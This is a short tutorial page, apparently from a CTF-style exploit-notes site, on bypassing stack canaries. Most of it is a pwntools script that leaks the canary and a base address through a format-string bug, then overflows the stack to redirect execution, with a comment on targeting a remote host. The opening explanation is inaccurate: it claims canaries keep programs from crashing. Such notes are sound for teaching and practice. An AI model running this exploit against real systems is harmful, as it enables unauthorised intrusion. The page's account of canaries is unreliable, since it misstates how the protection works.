Exploit Notes

Binary Exploitation with Canary Bypass

Last modified: 2023-02-12

Reverse Engineering

A canary helps to prevent buffer overflow attacks by detecting stack overflow and preventing the program from crashing. Canary Bypass is used to bypass the protection provided by the stack canary. This is done by finding a way to overwrite the canary value without corrupting it.

Exploitation

from pwn import *
import re

context.update(arch="amd64", os="linux")

filepath = "./example"
elf = context.binary = ELF(filepath)

p = process(filepath) # p = remote('example.com', '1337') for remote connection

# We need to find the stack canary. This address ends with "00".
# To find it, execute p.sendline(b"%p %p %p %p ...").
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90
canary = int(leaked[1], 16)
elf.address = base

payload = b"A"*24
payload += p64(canary)
payload += b"B"*8
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])

p.sendline(payload)
p.interactive()

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.